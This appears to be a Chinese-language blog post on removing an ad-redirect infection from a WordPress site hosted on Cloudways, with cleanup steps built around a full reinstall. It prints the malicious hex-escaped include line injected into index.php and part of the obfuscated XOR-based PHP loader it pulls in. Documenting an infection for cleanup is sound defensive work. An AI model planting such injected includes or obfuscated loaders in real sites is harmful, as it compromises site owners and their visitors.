CloudWays上的网站中病毒之后如何清理

今天碰到一个客户的网站，采用的是Cloudways的服务器，搭建的WordPress网站当手机访问的时候会自动跳转到第三方广告网站，这就是很明显的中病毒的症状。本文记录一下如何清理掉的这个广告跳转病毒。

和以前碰到的广告跳转病毒原理差不多，都是通过插件或者WordPress本身的漏洞，在服务器上传了病毒文件，比如在index.php文件下面，我们发现了这一串加密的代码。

<?php
/*85ba2*/

@include ("/hom\x65/10579**.cloudwaysapps.com/zmwjzu\x65gcg/public_html/wp\x2dinclud\x65s/blocks/sit\x65\x2dtitl\x65/.c963cc\x65\x65.oti");

/*85ba2*/

文件指向的是一个名为.c963ccee.oti的文件，包含的部分内容如下：

<?php
$om12efh = pack('H*', '0a0041131e05535551575008'); $ozsfhl = 'xa6fli70284m'; $ozsfhl = $ozsfhl ^ $om12efh;
$o8dk17mz = "";
$o8dk17mz .= $ozsfhl("G%05%19%1E%12%07%06%03%0C%40%0A%10A%09%10MDV%02%0E%3A%06A%01%00%0CV%17fUA%06%02%11%00%0EH%5D%40%24%183RV%05%0A%0B%00%06H%07%1D%5C%06X%5Bl%00%0C%0B%11K%17%006M%11%5CWG%06CBI%0E%5E");
$o8dk17mz .= $ozsfhl("%5DR%24%23PXZ%3C%10%00%11%06H%11%1B%5C%0CKi_%0C%04BI%0E%21%21%25bJ%02vZ%0D%0A%3A%16K%1B%5CNB%0C%5EiV%11%11%0A%17%5DHXI%1EJ%02vZ%0D%0A%3A%16K%1B%5CNC%02AiV%1B%06%06%10");

代码太长没办法完全解密，不过根据的经验，不用解密都知道这个是病毒文件，正常的WordPress程序文件都是开源的，不会出现加密的代码。

除了这个之外，文件夹下面还有其他的干扰文件，这里就不一一列举了。

分析出了感染方法，解决也很简单。就是删掉病毒文件，替换成正常文件就行。

最简单的方法就是删除所有WordPress的文件，重装一次。当然，uploads下面的文件是要手动保留的，不然你重装之后网站的图片就全部没有了。

Cloudways是托管型的VPS，所以给用户的权限不是最高的，使用sftp或者ssh还没有权限删掉病毒文件，所以这里需要联系客服处理。

最后，Cloudways上的网站中毒后处理步骤：

1. 备份一个中毒状态的网站数据备用；
2. 删除除了wp-content/uploads文件夹之外的所有文件和文件夹（需要联系客服帮你删除，不然权限不够）
3. 重新下载WordPress安装包，安装WordPress网站；
4. 重新安装之前的主题和插件。

这么操作完毕之后，病毒文件就没有了，如果你搞不定，可以付费找处理。

标签：病毒网站CloudWays